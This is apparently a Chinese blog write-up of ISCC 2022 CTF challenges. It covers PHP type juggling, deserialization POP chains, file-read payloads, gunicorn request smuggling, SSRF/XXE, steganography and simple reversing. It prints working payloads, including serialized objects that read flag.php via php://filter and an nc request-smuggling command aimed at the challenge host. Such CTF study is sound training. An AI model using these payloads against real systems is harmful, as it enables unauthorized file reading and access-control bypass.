web

冬奥会

<?phpshow_source(__FILE__);$Step1=False;
$Step2=False;$info=(array)json_decode(@$_GET['Information']);if(is_array($info)){var_dump($info);is_numeric(@$info["year"])?die("Sorry~"):NULL;//不能为纯数字if(@$info["year"]){($info["year"]=2022)?$Step1=True:NULL;//数字部分为2022}if(is_array(@$info["items"])){if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");//其是一个长度为3的数组，里边第一个元素是数组$status = array_search("skiing", $info["items"]);$status===false?die("Sorry~"):NULL;foreach($info["items"] as $key=>$val){$val==="skiing"?die("Sorry~"):NULL;//val!=="skiing"}$Step2=True;}
}if($Step1 && $Step2){include "2022flag.php";echo $flag;
}
?>

步骤：
现对于这段代码进行分析。

json_decode接受一个JSON格式的字符串并且把它转换为PHP变量 ,
JSON 格式的字符串 $json = '{"a":"php","b":"mysql","c":3}';

首先可得，我们需要get一个字符串。

is_array是一个函数，若变量为数组类型则返回true，否则返回false

is_numeric() — 检测变量是否为数字或数字字符串，是数字和数字字符串则返回 TRUE，否则返回 FALSE

要求里边元素第一个不能是纯数字,

die() 函数输出一条消息，并退出当前脚本

array_search() 函数与 in_array() 一样，在数组中查找一个键值。

“@” 来抑制错误信息

foreach as”是一个循环语句，用于遍历数组，语法为“foreach ($array as $value) {要执行代码;}”，每进行一次循环，当前数组元素的值就会被赋值给$value变量。

从而可得：?Information={"year":"2022a","items":[0,[1],2]}

解题收获：

有一个点：2022a
PHP提供了is_numeric函数，用来变量判断是否为数字。PHP弱类型语言的一个特性，当一个整形和一个其他类型行比较的时候，会先把其他类型intval数字化再比,
intval() 函数用于获取变量的整数值,从而使得…2022a=2022

pop

Happy New Year~ MAKE A WISH
<?phpecho 'Happy New Year~ MAKE A WISH<br>';if(isset($_GET['wish'])){@unserialize($_GET['wish']);
}
else{$a=new Road_is_Long;highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/class Road_is_Long{public $page;public $string;public function __construct($file='index.php'){$this->page = $file;}public function __toString(){return $this->string->page;}public function __wakeup(){if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {echo "You can Not Enter 2022";$this->page = "index.php";}}
}class  {protected  $var;public function append($value){include($value);}public function __invoke(){$this->append($this->var);}
}class Make_a_Change{public $effort;public function __construct(){$this->effort = array();}public function __get($key){$function = $this->effort;return $function();}
}
/**********************Try to See flag.php*****************************/

解题收获：（对于未知函数进行分析）

highlight_file函数用于对文件进行PHP语法高亮显示

isset() 函数用于检测变量是否已设置并且非 NULL。

unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化，并返回原始的对象结构。

public function __construct(参数列表)允许在实例化一个类之前先执行构造方法。
构造函数就是当对象被创建时，类中被自动调用的第一个函数，并且一个类中只能存在一个构造函数。和普通函数类似构造函数也可以带有参数，如果构造函数有参数的话，那么在实例化也需要传入对应的参数，

__toString()，类被当成字符串时的回应方法，此方法必须返回一个字符串，否则将发出一条 `E_RECOVERABLE_ERROR` 级别的致命错误。

__wakeup()当使用 unserialize() 反序列化一个对象成功后，会自动调用该对象的 __wakup() 魔术方法，该魔术方法既没有参数，也没有返回值。调用到__toString()

_invoke()，调用函数的方式调用一个对象时的回应方法
当尝试以调用函数的方式调用一个对象时，__invoke() 方法会被自动调用。

 __construct() 每次实例化一个类都会先调用该方法进行初始化。

__get() 魔术方法的使用。读取不可访问属性的值时，__get() 会被调用。

preg_match 函数用于执行一个正则表达式匹配（可以完成字符串的规则匹配）

步骤：

进一步，对于代码顺序进行梳理
unserialize() 反序列化一个对象成功后，自动调用该对象的 __wakup() 魔术方法，（ $this->page = "index.php"）一个的对象当作字符串调用到__toString()，
我们最后要得到include($value);从而要输入不可访问属性的值调用__get()，

首先对于此插件进行进一步使用。
编写运行可得：

<?php
class Road_is_Long{public $page;public $string;public function __construct($file){//($file='index.php')$this->page = $file;}public function __toString(){return "aaa";}
}class Try_Work_Hard {protected  $var='php://filter/read=convert.base64-encode/resource=flag.php' ;//代码最末尾提示flag.php
}class Make_a_Change{public $effort;
} $a = new Road_is_Long('flag');
$a->string = new Make_a_Change();
$a->string->effort = new Try_Work_Hard();
$b = new Road_is_Long($a);
echo urlencode(serialize($b));//题上有unserialize
?>

从而可得：wish=O%3A12%3A"Road_is_Long"%3A2%3A%7Bs%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A%7Bs%3A4%3A"page"%3Bs%3A3%3A"aaa"%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A%7Bs%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A%7Bs%3A6%3A"%00%2A%00var"%3Bs%3A57%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php"%3B%7D%7D%7Ds%3A6%3A"string"%3BN%3B%7D

findme

<?php
highlight_file(__FILE__);class a{public $un0;public $un1;public $un2;public $un3;public $un4;public function __destruct(){if(!empty($this->un0) && empty($this->un2)){$this -> Givemeanew();if($this -> un3 === 'unserialize'){$this -> yigei();}else{$this -> giao();}}}public function Givemeanew(){$this -> un4 = new $this->un0($this -> un1);}public function yigei(){echo 'Your output: '.$this->un4;}public function giao(){@eval($this->un2);}public function __wakeup(){include $this -> un2.'hint.php';}
}$data = $_POST['data'];
unserialize($data);

解题收获：（对于未知函数进行分析）

析构函数__destruct()的作用和构造函数__construct()正好相反，析构函数只有在对象被垃圾收集器收集前（即对象从内存中删除之前）才会被自动调用

empty() 函数用于检查一个变量是否为空。empty() 判断一个变量是否被认为是空的。当一个变量并不存在，或者它的值等同于 FALSE，那么它会被认为不存在。

步骤：

利用GlobIterator类测文件路径。
data=O:1:"a":5:{s:3:"un0";s:12:"GlobIterator";s:3:"un1";s:8:"hint.php";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}
<2> 确定文件目录后，用SplFileObject类进行文件读取。data=O:1:"a":5:{s:3:"un0";s:13:"SplFileObject";s:3:"un1";s:8:"hint.php";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}
?php类似于伪协议，因此我们继续用伪协议，读取一下 hint.php. 发现
data=O:1:"a":5:{s:3:"un0";s:13:"SplFileObject";s:3:"un1";s:57:"php://filter/read=convert.base64-encode/resource=hint.php";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;} 得到了flag的提示：
<3> 知道flag的特征之后，回去利用GlobIterator类，由于 GlobIterator 类支持直接通过模式匹配来寻找文件路径，也就是说假设我们知道一个文件名的一部分，我们可以通过该类的模式匹配找到其完整的文件名。data=O:1:"a":5:{s:3:"un0";s:12:"GlobIterator";s:3:"un1";s:6:"f*.txt";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}
知道了文件名和路径之后，就可以利用可读取文件类SplFileObject来读取flag了。

但首先要进行反编译
$b = 'fSSSbis19k_sdW15dMe.txt';
$b = serialize($b);
var_dump($b);
echo '<br/>';
echo '<br/>';$data='O:1:"a":5:{s:3:"un0";s:13:"SplFileObject";s:3:"un1";s:23:"fSSSbis19k_sdW15dMe.txt";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}';
$data = unserialize($data);
var_dump($data);

结果在post可得flag

爱国敬业好青年-2

步骤：
查看源码，URL/change,URL/flag,

解题收获：

首先对于题目具有一定的观察能力，爱国敬业好青年？图片其实已经给出位置提示
对于post的格式掌握准确

Easy-SQL

步骤：
由题中的提示，首先进行get找注入点，从而进行初步的SQL注入

访问压缩包下载，可得源码分析可得。
满⾜username=admin并且password=password，⼀共是3列，内容：id，username，password
post

解题收获：

MySQL8进行了一定了解，语法新特性：支持UNION联合查询、ORDER BY排序、LIMIT子句限制产生的行数。尤其注意，所在列的后一列需要用字符表示，不能用数字，否则判断到当前列的最后一个字符会判断不出！.最好用<=替换<，

让我康康！

步骤：
提⽰Try flag

服务器是gunicorn20.0.0,想到请求⾛私
虚拟机进行操作

echo -en "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 123\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: 127.0.0.1/fl4g\r\nX-Forwarded-For: 127.0.0.1\r\nsecr3t_ip: 127.0.0.1\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 59.110.159.206 702

解题收获：

在gunicorn 20.0.4 版本中，存在一个请求走私漏洞，无论在gunicorn 前使用哪个代理，该漏洞都有效。 Http头中的Sec-Websocket-Key: 1，会进行特殊解析，从而引发此漏洞。

这是一道代码审计题

步骤：
网页提示，进入 /index 页面 ,进入后并无提示，尝试抓包，

而后发现提示，进入 ./static/code.txt

用base100解码可得，由于网页限制，使得不能一次翻译到位。

def geneSign():if(control_key==1):return render_template("index.html")else:return "You have not access to this page!"
def check_ssrf(url):hostname = urlparse(url).hostnametry:if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):raise BaseException("url format error")if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):if judge_ip(hostname):return Truereturn False, "You not get the right clue!"else:ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]if is_inner_ipaddress(ip_address):return False,"inner ip address attack"else:return False, "You not get the right clue!"except BaseException as e:return False, str(e)except:return False, "unknow error"
def ip2long(ip_addr):return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):ip = ip2long(ip)print(ip)return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):forbidden_list = [ '.', '0', '1', '2', '7']for word in forbidden_list:if ip and word:if word in ip.lower():return Truereturn False
def judge_ip(ip):if(waf1(ip)):return Fasleelse:addr = addr.encode(encoding = "utf-8")ipp = base64.encodestring(addr)ipp = ipp.strip().lower().decode()if(ip==ipp):global control_keycontrol_key = 1return Trueelse:return Fals

访问网址/index?url=https://@mti3ljaumc4x

ip我们可控的，所以构造ip=/mti3ljaumc4x,可得提示，进一步在抓包中进行cookic替换，使用传参方式POST，

 POST /mti3ljaumc4x/codelogin

在codelogin⽅法中定义了请求⽅式和请求的数据，数据就是data，cv一下

解题收获：
contentType是xml，是个xxe，根据js构造数据包，因为是 xml 数据推测存在 xxe 漏洞，尝试文件读取（不需要写协议）

MISC

隐秘的信息

步骤：

带入压缩包

fd254d0d0ded54d0 d1a9950550dd98c9a1d989e1cd19051c e1e5f7fc01f8007f
转二进制，删除头，解码可得

解题收获：
Stegsolve软件进行进一步的使用理解，
LSB隐写有其固定的步骤：

还有一个比较简单的方法，用zsteg工具，需要kali里面在线安装：gem install zsteg，使用命令格式：zsteg filename

真相只有一个

步骤：
打开压缩包，修改长宽高。

文件头前端与zip源文件数据区基本相同，修改图中文件,改后缀

文件爆破

Audacity打开

cmd中

.\SNOW.EXE -p isccmisc -C .\flag.txt

解题收获：
流量包，wireshark打开，
进入flag.txt，发现看不到数据，利用snow隐写

单板小将苏翊鸣

步骤：
进入010，修改图片高度

扫描得到提示，密码，带入可得flag

解题收获：
修改图片，一般只选择修改高度，随意修改宽度大多会造成图像图片出错。

藏在星空中的诗-1

步骤：
对文件图层分离，可得

将文档的星星按图上的顺序进行排列带入得到密码表
按txt文档顺序翻译组合可得flag。
解题收获：
图层的分离，没有ps软件，可以用在线网址

藏在星空中的诗-2

步骤：
文件中5个为一组，每组前三个均替换成u00

与表格（key_to_the_Poem）第三列对照，例✴为u+2734,则✴就用4进行替换

带入解码
解题收获：
掌握每一种编码的形式，对于星星的规律，才能在较短时间内找到题解。

2022冬奥会

步骤：
身为东道主的你知道此次冬奥会的吉祥物分别是谁吗？并且你知道这两只冬奥会的吉祥物最初设计的原型分别是什么吗？
按题目提示（图片修改长宽高后，还有提示），可直接将“灯笼”填入可得
得到一个损坏图片，拖入010既得

降维打击

步骤：
使用010图片分离，可得
zsteg工具分析，提取可得

魔女字体，对照翻译
解题收获：
PNG隐写工具 zsteg的使用方法：zsteg可以检测PNG和BMP图片里的隐写数据

zsteg -a [png图片]
zsteg -E "b1,r,lsb,yx" [png图片] > out.png

REVERSE

GetTheTable

步骤：
IDA打开，找到main，tab反编译
找到信息，解码

Bob’s Code

步骤：
IDA打开，找到main，得到字符串

import base64
import stringa = '代码'
secret = ''
for j in a:if(j == '.'):print(j,end='')continueif(ord(j)>=48 and ord(j)<=57):print(j,end='')continuefor i in range(65,127):if(i>=65 and i <=90):if((i + 2 - 65) % 26 + 65 == ord(j)):print(chr(i),end='')breakelif(i>=97 and i <= 123):if((i + 2 - 97) % 26 + 97 == ord(j)):print(chr(i),end='')break
print('\n')
print(secret)
str1 = '===='string1 = "ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"flag1 = base64.b64decode(str1.translate(str.maketrans(string1,string2)))
flag = base64.b64decode(flag1)
print(flag)

放入a中，之后结果放入str1中，可得flag
解题收获：
tab进行反编译（时间长不写都忘了），其次就是脚本能力，我只会改脚本…

ISCC 2022 部分相关推荐

ISCC 2022 wp
目录解题步骤及过程: 练武题WP: Web: 冬奥会: 爱国敬业好青年-2: Pop2022: 这是一道代码审计题: Easy-SQL: Findme: 让我康康!: misc: 2022冬奥会: ...
【科研】2023年CCF-B和CCF-C类会议截稿时间整理
以下是相对而言(非常相对)比较好中的一些B类和C类会议2023年的时间整理 CCF-B B类会议截稿日期通知日期会议日期会议地点备注 ICCS 2023/2/3 2023/4/3 2023/ ...
2022年多媒体领域国际会议期刊汇总
会议期刊时间汇总一.会议时间二.期刊一.会议时间 2022年会议日期更新 2022会议级别投稿日期结果日期备注 MMSys B 0121 0302 12页 IWQoS B 0201 04 ...
参加历年CTF大赛（2022年起持续更新）
目录 2022.10.核能行业赛道·福清·培训MISC 0x00.写在前面 0x01.Aesop[AES对称加密.gif隐写] 0x02.DIO[png隐写.base64] 0x03.message[ ...
2022年新能源汽车产业集群百人会
2022年新能源汽车产业集群百人会 3月25日-3月27日,2022年第八届中国电动汽车百人会(以下简称百人会)在线上举办.本届论坛以"迎接新能源汽车市场化发展新阶段"为主题. ...
2022年AI芯片场景
2022年AI芯片场景随着技术成熟化,AI芯片的应用场景除了在云端及大数据中心,也会随着算力逐渐向边缘端移动,部署于智能家居.智能制造.智慧金融等领域:同时还将随着智能产品种类日渐丰富,部署于智能 ...
回顾2021，展望2022
2021,这一年最大的收获是孕育了一个聪明漂亮机灵的小家伙.这一年我虚岁28岁,和爱的人有了爱的结晶.东哥各方面都挺好的,我们都不是圣人,都是能力有限的普通人,但他在尽其所能的对我好.我不是万能的人, ...
Maya 2022中的硬表面建模技术学习视频教程
Maya 2022中的硬表面建模信息: 使用正确的拓扑和边流在Maya中建模硬曲面对象. 你会学到什么硬质表面工具和技术细分工作流程边缘流动控制正确拓扑材料设置 Studio Lightn ...
MAYA 2022基础入门学习教程
流派:电子学习| MP4 |视频:h264,1280×720 |音频:AAC,48.0 KHz 语言:英语+中英文字幕(根据原英文字幕机译更准确)|大小解压后:3.41 GB |时长:4.5小时包含 ...

ISCC 2022 部分

目录

web

冬奥会

pop